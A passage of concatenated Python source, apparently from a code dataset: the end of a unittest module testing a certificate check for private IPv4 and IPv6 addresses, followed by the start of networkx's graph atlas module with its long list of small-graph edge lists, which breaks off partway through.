                                       (172, 32, 0, 5),
                                       (172, 5, 1, 1),
                                       (192, 15, 0, 0)])
        result = ip_addresses.CheckPrivateIpAddresses().check(certificate)
        self.assertEqual(len(result), 0)

    def test_not_private_ipv6(self):
        certificate = self._mock_cert(
            [(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15)])
        result = ip_addresses.CheckPrivateIpAddresses().check(certificate)
        self.assertEqual(len(result), 0)

    def test_private_ipv6(self):
        certificate = self._mock_cert(
            [(253, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15)])
        result = ip_addresses.CheckPrivateIpAddresses().check(certificate)
        self.assertEqual(len(result), 1)
# Allow running this test module directly.
if __name__ == '__main__':
 unittest.main()
| apache-2.0 |
goyalankit/po-compiler | object_files/networkx-1.8.1/networkx/generators/atlas.py | 49 | 214318 | """
Generators for the small graph atlas.
See
"An Atlas of Graphs" by Ronald C. Read and Robin J. Wilson,
Oxford University Press, 1998.
Because of its size, this module is not imported by default.
"""
# Copyright (C) 2004-2008 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
__author__ = """Pieter Swart (swart@lanl.gov)"""
__all__ = ['graph_atlas_g']
from networkx.generators.small import make_small_graph
def graph_atlas_g():
"""
Return the list [G0,G1,...,G1252] of graphs as named in the Graph Atlas.
G0,G1,...,G1252 are all graphs with up to 7 nodes.
The graphs are listed:
1. in increasing order of number of nodes;
2. for a fixed number of nodes,
in increasing order of the number of edges;
3. for fixed numbers of nodes and edges,
in increasing order of the degree sequence,
for example 111223 < 112222;
4. for fixed degree sequence, in increasing number of automorphisms.
Note that indexing is set up so that for
GAG=graph_atlas_g(), then
G123=GAG[123] and G[0]=empty_graph(0)
"""
descr_list=[
['edgelist', 'G0', 0, []],
['edgelist', 'G1', 1, []],
['edgelist', 'G2', 2, []],
['edgelist', 'G3', 2, [[1, 2]]],
['edgelist', 'G4', 3, []],
['edgelist', 'G5', 3, [[2, 3]]],
['edgelist', 'G6', 3, [[1, 2], [1, 3]]],
['edgelist', 'G7', 3, [[1, 2], [1, 3], [2, 3]]],
['edgelist', 'G8', 4, []],
['edgelist', 'G9', 4, [[4, 3]]],
['edgelist', 'G10', 4, [[4, 3], [4, 2]]],
['edgelist', 'G11', 4, [[1, 2], [4, 3]]],
['edgelist', 'G12', 4, [[4, 3], [2, 3], [4, 2]]],
['edgelist', 'G13', 4, [[4, 1], [4, 2], [4, 3]]],
['edgelist', 'G14', 4, [[1, 2], [2, 3], [1, 4]]],
['edgelist', 'G15', 4, [[4, 3], [2, 3], [4, 2], [4, 1]]],
['edgelist', 'G16', 4, [[1, 2], [2, 3], [3, 4], [1, 4]]],
['edgelist', 'G17', 4, [[1, 2], [1, 3], [1, 4], [2, 3], [3, 4]]],
['edgelist', 'G18', 4, [[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3]]],
['edgelist', 'G19', 5, []],
['edgelist', 'G20', 5, [[5, 4]]],
['edgelist', 'G21', 5, [[2, 3], [1, 2]]],
['edgelist', 'G22', 5, [[1, 3], [5, 4]]],
['edgelist', 'G23', 5, [[2, 3], [1, 2], [3, 1]]],
['edgelist', 'G24', 5, [[5, 4], [4, 3], [4, 2]]],
['edgelist', 'G25', 5, [[4, 3], [5, 4], [1, 5]]],
['edgelist', 'G26', 5, [[2, 3], [1, 2], [5, 4]]],
['edgelist', 'G27', 5, [[5, 4], [2, 3], [4, 2], [4, 3]]],
['edgelist', 'G28', 5, [[1, 4], [2, 1], [3, 2], [4, 3]]],
['edgelist', 'G29', 5, [[5, 4], [5, 1], [5, 2], [5, 3]]],
['edgelist', 'G30', 5, [[5, 1], [4, 2], [5, 4], [4, 3]]],
['edgelist', 'G31', 5, [[3, 4], [2, 3], [1, 2], [5, 1]]],
['edgelist', 'G32', 5, [[2, 3], [1, 2], [3, 1], [5, 4]]],
['edgelist', 'G33', 5, [[1, 4], [3, 1], [4, 3], [2, 1], [3, 2]]],
['edgelist', 'G34', 5, [[5, 3], [5, 4], [3, 4], [5, 2], [5, 1]]],
['edgelist', 'G35', 5, [[1, 2], [2, 3], [3, 4], [1, 5], [1, 3]]],
['edgelist', 'G36', 5, [[5, 1], [2, 3], [5, 4], [4, 3], [4, 2]]],
['edgelist', 'G37', 5, [[2, 1], [5, 2], [3, 5], [4, 3], [2, 4]]],
['edgelist', 'G38', 5, [[1, 2], [2, 3], [3, 4], [4, 5], [1, 5]]],
['edgelist', 'G39', 5, [[2, 1], [5, 2], [5, 1], [1, 4], [2, 4], [4, 5]]],
['edgelist', 'G40', 5, [[2, 1], [5, 2], [3, 5], [4, 3], [2, 4], [3, 2]]],
['edgelist', 'G41', 5, [[2, 1], [5, 2], [3, 5], [4, 3], [2, 4], [4, 5]]],
['edgelist', 'G42', 5, [[1, 2], [5, 4], [3, 4], [5, 3], [5, 1], [5, 2]]],
['edgelist', 'G43', 5, [[1, 5], [4, 1], [5, 4], [3, 4], [2, 3], [1, 2]]],
['edgelist', 'G44', 5, [[3, 2], [1, 3], [4, 1], [2, 4], [5, 2], [1, 5]]],
['edgelist',
'G45',
5,
[[5, 1], [2, 3], [5, 4], [4, 3], [4, 2], [5, 2], [3, 5]]],
['edgelist',
'G46',
5,
[[5, 2], [3, 5], [4, 3], [2, 4], [4, 5], [1, 4], [5, 1]]],
['edgelist',
'G47',
5,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2]]],
['edgelist',
'G48',
5,
[[3, 2], [1, 3], [4, 1], [2, 4], [5, 2], [1, 5], [3, 5]]],
['edgelist',
'G49',
5,
[[2, 1], [5, 2], [3, 5], [4, 3], [2, 4], [5, 1], [4, 5], [1, 4]]],
['edgelist',
'G50',
5,
[[1, 2], [2, 3], [3, 4], [1, 4], [5, 1], [5, 2], [5, 3], [5, 4]]],
['edgelist',
'G51',
5,
[[1, 2], [4, 5], [1, 4], [1, 5], [2, 3], [2, 4], [2, 5], [3, 4], [3, 5]]],
['edgelist',
'G52',
5,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5]]],
['edgelist', 'G53', 6, []],
['edgelist', 'G54', 6, [[6, 5]]],
['edgelist', 'G55', 6, [[1, 4], [6, 5]]],
['edgelist', 'G56', 6, [[2, 4], [2, 3]]],
['edgelist', 'G57', 6, [[2, 4], [3, 2], [4, 3]]],
['edgelist', 'G58', 6, [[1, 4], [6, 1], [5, 1]]],
['edgelist', 'G59', 6, [[5, 4], [6, 5], [1, 6]]],
['edgelist', 'G60', 6, [[5, 4], [6, 2], [6, 3]]],
['edgelist', 'G61', 6, [[2, 3], [4, 1], [6, 5]]],
['edgelist', 'G62', 6, [[1, 4], [5, 1], [6, 5], [1, 6]]],
['edgelist', 'G63', 6, [[4, 1], [6, 4], [5, 6], [1, 5]]],
['edgelist', 'G64', 6, [[6, 2], [6, 4], [6, 3], [1, 6]]],
['edgelist', 'G65', 6, [[5, 4], [4, 2], [5, 1], [4, 3]]],
['edgelist', 'G66', 6, [[1, 3], [2, 4], [3, 2], [6, 4]]],
['edgelist', 'G67', 6, [[2, 4], [3, 2], [4, 3], [1, 6]]],
['edgelist', 'G68', 6, [[2, 3], [1, 4], [6, 1], [5, 1]]],
['edgelist', 'G69', 6, [[5, 6], [2, 3], [1, 6], [4, 5]]],
['edgelist', 'G70', 6, [[1, 3], [5, 1], [4, 2], [6, 4]]],
['edgelist', 'G71', 6, [[4, 1], [6, 4], [5, 6], [1, 5], [6, 1]]],
['edgelist', 'G72', 6, [[6, 4], [4, 2], [4, 3], [5, 4], [5, 6]]],
['edgelist', 'G73', 6, [[6, 4], [6, 5], [3, 4], [4, 5], [1, 5]]],
['edgelist', 'G74', 6, [[5, 4], [2, 3], [5, 1], [4, 3], [4, 2]]],
['edgelist', 'G75', 6, [[2, 5], [4, 5], [5, 1], [3, 2], [4, 3]]],
['edgelist', 'G76', 6, [[1, 2], [2, 3], [3, 4], [4, 5], [1, 5]]],
['edgelist', 'G77', 6, [[6, 4], [6, 5], [6, 1], [6, 2], [6, 3]]],
['edgelist', 'G78', 6, [[2, 5], [6, 2], [2, 1], [3, 2], [3, 4]]],
['edgelist', 'G79', 6, [[1, 2], [4, 5], [1, 3], [4, 1], [6, 4]]],
['edgelist', 'G80', 6, [[2, 1], [3, 2], [3, 5], [2, 4], [6, 4]]],
['edgelist', 'G81', 6, [[5, 4], [1, 6], [5, 1], [4, 3], [4, 2]]],
['edgelist', 'G82', 6, [[2, 3], [1, 2], [5, 6], [2, 4], [3, 4]]],
['edgelist', 'G83', 6, [[1, 2], [1, 6], [3, 4], [4, 5], [5, 6]]],
['edgelist', 'G84', 6, [[5, 4], [6, 2], [6, 3], [1, 4], [5, 1]]],
['edgelist', 'G85', 6, [[2, 3], [4, 1], [6, 4], [5, 6], [1, 5]]],
['edgelist', 'G86', 6, [[1, 4], [6, 1], [5, 6], [4, 5], [6, 4], [5, 1]]],
['edgelist', 'G87', 6, [[2, 5], [3, 5], [5, 1], [3, 4], [4, 2], [4, 5]]],
['edgelist', 'G88', 6, [[2, 5], [3, 5], [5, 1], [3, 2], [4, 2], [3, 4]]],
['edgelist', 'G89', 6, [[3, 1], [6, 5], [5, 4], [6, 4], [5, 1], [3, 5]]],
['edgelist', 'G90', 6, [[4, 3], [5, 4], [1, 5], [2, 1], [3, 2], [1, 4]]],
['edgelist', 'G91', 6, [[5, 2], [4, 2], [5, 3], [4, 3], [3, 1], [2, 1]]],
['edgelist', 'G92', 6, [[6, 3], [6, 4], [6, 5], [4, 5], [6, 2], [6, 1]]],
['edgelist', 'G93', 6, [[5, 4], [5, 3], [5, 1], [2, 5], [4, 1], [6, 4]]],
['edgelist', 'G94', 6, [[5, 4], [4, 6], [6, 5], [6, 2], [4, 3], [5, 1]]],
['edgelist', 'G95', 6, [[5, 3], [2, 3], [5, 4], [5, 2], [5, 1], [1, 6]]],
['edgelist', 'G96', 6, [[2, 3], [4, 2], [1, 4], [3, 1], [5, 1], [6, 1]]],
['edgelist', 'G97', 6, [[3, 1], [5, 3], [2, 5], [3, 2], [4, 2], [6, 4]]],
['edgelist', 'G98', 6, [[2, 3], [4, 2], [1, 4], [3, 1], [5, 1], [6, 4]]],
['edgelist', 'G99', 6, [[6, 4], [3, 6], [3, 1], [5, 3], [5, 4], [4, 2]]],
['edgelist', 'G100', 6, [[1, 3], [4, 5], [2, 1], [6, 4], [5, 6], [4, 1]]],
['edgelist', 'G101', 6, [[2, 3], [4, 1], [6, 4], [5, 6], [1, 5], [6, 1]]],
['edgelist', 'G102', 6, [[5, 4], [2, 3], [5, 1], [4, 3], [4, 2], [6, 1]]],
['edgelist', 'G103', 6, [[2, 5], [3, 5], [5, 1], [1, 6], [4, 2], [3, 4]]],
['edgelist', 'G104', 6, [[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 6]]],
['edgelist', 'G105', 6, [[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6]]],
['edgelist', 'G106', 6, [[2, 4], [3, 2], [4, 3], [1, 5], [6, 1], [5, 6]]],
['edgelist',
'G107',
6,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [1, 6]]],
['edgelist',
'G108',
6,
[[2, 5], [3, 5], [3, 2], [4, 2], [3, 4], [3, 1], [1, 2]]],
['edgelist',
'G109',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2]]],
['edgelist',
'G110',
6,
[[1, 2], [4, 3], [1, 3], [4, 1], [4, 2], [6, 2], [6, 3]]],
['edgelist',
'G111',
6,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [4, 5]]],
['edgelist',
'G112',
6,
[[2, 1], [5, 2], [3, 5], [4, 3], [6, 2], [3, 6], [2, 3]]],
['edgelist',
'G113',
6,
[[1, 5], [3, 1], [2, 3], [4, 2], [6, 4], [4, 1], [3, 4]]],
['edgelist',
'G114',
6,
[[2, 5], [3, 5], [3, 4], [3, 2], [4, 2], [5, 6], [1, 5]]],
['edgelist',
'G115',
6,
[[2, 1], [5, 2], [3, 5], [4, 3], [6, 2], [3, 6], [5, 6]]],
['edgelist',
'G116',
6,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [6, 5]]],
['edgelist',
'G117',
6,
[[1, 6], [5, 1], [6, 5], [1, 3], [4, 1], [4, 3], [1, 2]]],
['edgelist',
'G118',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 6], [5, 2]]],
['edgelist',
'G119',
6,
[[1, 2], [5, 1], [2, 5], [1, 3], [4, 1], [4, 3], [4, 6]]],
['edgelist',
'G120',
6,
[[2, 5], [3, 5], [5, 1], [1, 6], [4, 2], [3, 4], [4, 5]]],
['edgelist',
'G121',
6,
[[3, 1], [4, 3], [5, 4], [6, 5], [3, 6], [2, 3], [5, 2]]],
['edgelist',
'G122',
6,
[[2, 6], [1, 2], [5, 1], [4, 5], [3, 4], [2, 3], [1, 4]]],
['edgelist',
'G123',
6,
[[2, 5], [3, 5], [5, 1], [1, 6], [4, 2], [3, 4], [3, 2]]],
['edgelist',
'G124',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [1, 3], [6, 2]]],
['edgelist',
'G125',
6,
[[3, 1], [5, 2], [2, 3], [6, 5], [3, 6], [4, 2], [6, 4]]],
['edgelist',
'G126',
6,
[[6, 1], [4, 6], [3, 4], [1, 3], [2, 4], [5, 2], [4, 5]]],
['edgelist',
'G127',
6,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [3, 4]]],
['edgelist',
'G128',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [1, 4]]],
['edgelist',
'G129',
6,
[[5, 4], [1, 5], [2, 1], [3, 2], [4, 3], [1, 6], [6, 4]]],
['edgelist',
'G130',
6,
[[2, 3], [1, 2], [3, 1], [4, 1], [5, 4], [6, 5], [4, 6]]],
['edgelist',
'G131',
6,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2]]],
['edgelist',
'G132',
6,
[[1, 2], [2, 3], [3, 4], [1, 4], [5, 1], [5, 2], [5, 3], [5, 4]]],
['edgelist',
'G133',
6,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [6, 1], [1, 5]]],
['edgelist',
'G134',
6,
[[2, 3], [4, 2], [1, 4], [2, 1], [3, 1], [4, 3], [6, 4], [5, 1]]],
['edgelist',
'G135',
6,
[[1, 2], [3, 5], [1, 3], [6, 3], [4, 2], [4, 3], [3, 2], [5, 2]]],
['edgelist',
'G136',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [2, 6]]],
['edgelist',
'G137',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 5]]],
['edgelist',
'G138',
6,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [3, 2], [6, 2]]],
['edgelist',
'G139',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 1]]],
['edgelist',
'G140',
6,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [4, 1], [6, 2]]],
['edgelist',
'G141',
6,
[[3, 1], [4, 3], [5, 4], [6, 5], [3, 6], [2, 3], [5, 2], [6, 4]]],
['edgelist',
'G142',
6,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [1, 6], [6, 5]]],
['edgelist',
'G143',
6,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [6, 2], [6, 4]]],
['edgelist',
'G144',
6,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [4, 5]]],
['edgelist',
'G145',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 1], [6, 3], [1, 3]]],
['edgelist',
'G146',
6,
[[2, 6], [5, 2], [1, 5], [6, 1], [3, 6], [5, 3], [4, 5], [6, 4]]],
['edgelist',
'G147',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 3]]],
['edgelist',
'G148',
6,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [2, 5], [1, 2]]],
['edgelist',
'G149',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1]]],
['edgelist',
'G150',
6,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [3, 2]]],
['edgelist',
'G151',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [5, 6], [6, 4], [2, 6]]],
['edgelist',
'G152',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 2]]],
['edgelist',
'G153',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 6], [6, 3], [6, 1]]],
['edgelist',
'G154',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [5, 2], [6, 3]]],
['edgelist',
'G155',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [3, 5], [1, 4]]],
['edgelist',
'G156',
6,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2], [5, 3]]],
['edgelist',
'G157',
6,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2], [1, 5]]],
['edgelist',
'G158',
6,
[[1, 2], [2, 3], [3, 4], [1, 4], [5, 1], [5, 2], [5, 3], [5, 4], [5, 6]]],
['edgelist',
'G159',
6,
[[3, 1], [5, 2], [2, 3], [6, 5], [3, 6], [4, 2], [6, 4], [4, 3], [5, 4]]],
['edgelist',
'G160',
6,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2], [5, 6]]],
['edgelist',
'G161',
6,
[[2, 6], [5, 2], [1, 5], [6, 1], [3, 6], [5, 3], [4, 5], [6, 4], [5, 6]]],
['edgelist',
'G162',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [3, 6], [1, 6], [3, 1], [4, 1]]],
['edgelist',
'G163',
6,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [1, 5], [2, 1], [5, 2]]],
['edgelist',
'G164',
6,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [5, 2], [2, 1], [6, 2]]],
['edgelist',
'G165',
6,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [6, 5], [5, 1], [6, 1]]],
['edgelist',
'G166',
6,
[[5, 4], [1, 5], [2, 1], [3, 2], [4, 3], [1, 6], [6, 4], [1, 4], [2, 6]]],
['edgelist',
'G167',
6,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [4, 3], [1, 4], [5, 1]]],
['edgelist',
'G168',
6,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [4, 3], [1, 4], [3, 5]]],
['edgelist',
'G169',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [3, 6], [1, 6], [3, 1], [6, 2]]],
['edgelist',
'G170',
6,
[[2, 6], [5, 2], [1, 5], [6, 1], [3, 6], [5, 3], [4, 5], [6, 4], [3, 1]]],
['edgelist',
'G171',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 1], [6, 5], [6, 3], [6, 4]]],
['edgelist',
'G172',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1], [6, 2]]],
['edgelist',
'G173',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [1, 4], [5, 3], [6, 3]]],
['edgelist',
'G174',
6,
[[3, 4], [1, 3], [4, 1], [5, 4], [2, 5], [6, 2], [5, 6], [2, 1], [6, 3]]],
['edgelist',
'G175',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [1, 4], [6, 3], [5, 2]]],
['edgelist',
'G176',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 3]]],
['edgelist',
'G177',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[5, 6]]],
['edgelist',
'G178',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 6]]],
['edgelist',
'G179',
6,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[5, 6],
[2, 1]]],
['edgelist',
'G180',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[6, 5],
[4, 6],
[2, 6]]],
['edgelist',
'G181',
6,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[5, 1],
[3, 5]]],
['edgelist',
'G182',
6,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 3]]],
['edgelist',
'G183',
6,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[5, 6],
[4, 5],
[2, 4],
[6, 2],
[3, 4],
[2, 3]]],
['edgelist',
'G184',
6,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[6, 3]]],
['edgelist',
'G185',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[5, 2]]],
['edgelist',
'G186',
6,
[[1, 2],
[3, 5],
[1, 3],
[5, 6],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4]]],
['edgelist',
'G187',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[6, 5]]],
['edgelist',
'G188',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[1, 3],
[2, 4],
[6, 2]]],
['edgelist',
'G189',
6,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[4, 3],
[1, 4]]],
['edgelist',
'G190',
6,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[6, 4],
[3, 6],
[2, 1]]],
['edgelist',
'G191',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 3],
[2, 6]]],
['edgelist',
'G192',
6,
[[1, 2],
[3, 5],
[1, 3],
[3, 2],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4]]],
['edgelist',
'G193',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1],
[5, 6]]],
['edgelist',
'G194',
6,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[1, 3]]],
['edgelist',
'G195',
6,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[6, 4],
[3, 6],
[2, 1],
[6, 2]]],
['edgelist',
'G196',
6,
[[2, 4],
[5, 2],
[4, 5],
[3, 4],
[1, 3],
[5, 1],
[6, 5],
[3, 6],
[5, 3],
[1, 6],
[2, 6]]],
['edgelist',
'G197',
6,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2]]],
['edgelist',
'G198',
6,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3]]],
['edgelist',
'G199',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[1, 4]]],
['edgelist',
'G200',
6,
[[1, 2],
[2, 3],
[1, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[5, 4]]],
['edgelist',
'G201',
6,
[[4, 3],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[3, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2],
[1, 5]]],
['edgelist',
'G202',
6,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3],
[5, 6]]],
['edgelist',
'G203',
6,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2],
[3, 4]]],
['edgelist',
'G204',
6,
[[1, 2],
[2, 3],
[1, 3],
[4, 3],
[4, 2],
[5, 1],
[3, 5],
[6, 2],
[1, 6],
[5, 6],
[4, 5],
[6, 4]]],
['edgelist',
'G205',
6,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2],
[3, 4],
[1, 5]]],
['edgelist',
'G206',
6,
[[1, 2],
[2, 3],
[1, 3],
[4, 3],
[4, 2],
[5, 1],
[3, 5],
[6, 2],
[1, 6],
[5, 6],
[4, 5],
[6, 4],
[4, 1]]],
['edgelist',
'G207',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[2, 4],
[3, 1],
[5, 1],
[6, 4]]],
['edgelist',
'G208',
6,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[5, 6]]],
['edgelist', 'G209', 7, []],
['edgelist', 'G210', 7, [[7, 6]]],
['edgelist', 'G211', 7, [[3, 4], [2, 3]]],
['edgelist', 'G212', 7, [[6, 5], [7, 1]]],
['edgelist', 'G213', 7, [[1, 5], [5, 3], [3, 1]]],
['edgelist', 'G214', 7, [[1, 2], [1, 7], [1, 6]]],
['edgelist', 'G215', 7, [[6, 5], [7, 1], [6, 7]]],
['edgelist', 'G216', 7, [[4, 3], [2, 3], [6, 7]]],
['edgelist', 'G217', 7, [[4, 2], [6, 7], [1, 5]]],
['edgelist', 'G218', 7, [[3, 6], [7, 3], [6, 7], [2, 3]]],
['edgelist', 'G219', 7, [[2, 3], [5, 2], [6, 5], [3, 6]]],
['edgelist', 'G220', 7, [[2, 1], [6, 2], [2, 3], [5, 2]]],
['edgelist', 'G221', 7, [[2, 1], [3, 2], [6, 3], [7, 3]]],
['edgelist', 'G222', 7, [[4, 5], [3, 4], [2, 3], [1, 2]]],
['edgelist', 'G223', 7, [[5, 3], [1, 5], [3, 1], [6, 7]]],
['edgelist', 'G224', 7, [[1, 2], [7, 1], [1, 6], [5, 3]]],
['edgelist', 'G225', 7, [[4, 2], [6, 5], [7, 6], [1, 7]]],
['edgelist', 'G226', 7, [[1, 5], [4, 1], [3, 6], [7, 3]]],
['edgelist', 'G227', 7, [[3, 4], [2, 3], [7, 1], [6, 5]]],
['edgelist', 'G228', 7, [[1, 5], [4, 1], [2, 4], [5, 2], [2, 1]]],
['edgelist', 'G229', 7, [[3, 6], [7, 3], [6, 7], [5, 3], [4, 3]]],
['edgelist', 'G230', 7, [[5, 3], [5, 1], [3, 1], [6, 5], [7, 1]]],
['edgelist', 'G231', 7, [[3, 6], [7, 3], [6, 7], [2, 3], [1, 2]]],
['edgelist', 'G232', 7, [[5, 2], [1, 5], [4, 1], [2, 4], [3, 2]]],
['edgelist', 'G233', 7, [[2, 3], [1, 2], [5, 1], [4, 5], [3, 4]]],
['edgelist', 'G234', 7, [[6, 2], [6, 1], [3, 6], [4, 6], [5, 6]]],
['edgelist', 'G235', 7, [[2, 6], [7, 2], [2, 1], [3, 2], [4, 3]]],
['edgelist', 'G236', 7, [[2, 6], [5, 2], [3, 4], [7, 3], [3, 2]]],
['edgelist', 'G237', 7, [[2, 6], [7, 2], [2, 3], [3, 4], [5, 4]]],
['edgelist', 'G238', 7, [[3, 2], [4, 3], [5, 4], [6, 5], [4, 7]]],
['edgelist', 'G239', 7, [[7, 6], [3, 7], [2, 3], [6, 3], [4, 5]]],
['edgelist', 'G240', 7, [[5, 4], [6, 5], [7, 6], [1, 7], [2, 1]]],
['edgelist', 'G241', 7, [[1, 5], [4, 1], [3, 6], [7, 3], [6, 7]]],
['edgelist', 'G242', 7, [[5, 2], [6, 3], [7, 6], [4, 7], [3, 4]]],
['edgelist', 'G243', 7, [[2, 5], [4, 2], [2, 1], [3, 2], [7, 6]]],
['edgelist', 'G244', 7, [[1, 5], [4, 1], [2, 1], [3, 2], [7, 6]]],
['edgelist', 'G245', 7, [[1, 5], [4, 1], [3, 2], [6, 3], [7, 3]]],
